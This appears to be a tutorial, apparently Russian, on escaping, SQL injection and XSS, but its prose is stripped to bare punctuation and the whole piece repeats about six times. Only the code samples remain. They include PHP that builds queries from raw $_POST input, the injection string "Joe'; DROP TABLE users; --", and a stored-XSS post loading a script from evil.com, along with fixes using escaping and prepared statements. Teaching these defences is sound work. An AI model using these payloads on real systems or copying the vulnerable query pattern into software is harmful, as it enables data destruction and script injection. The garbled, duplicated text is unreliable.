, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

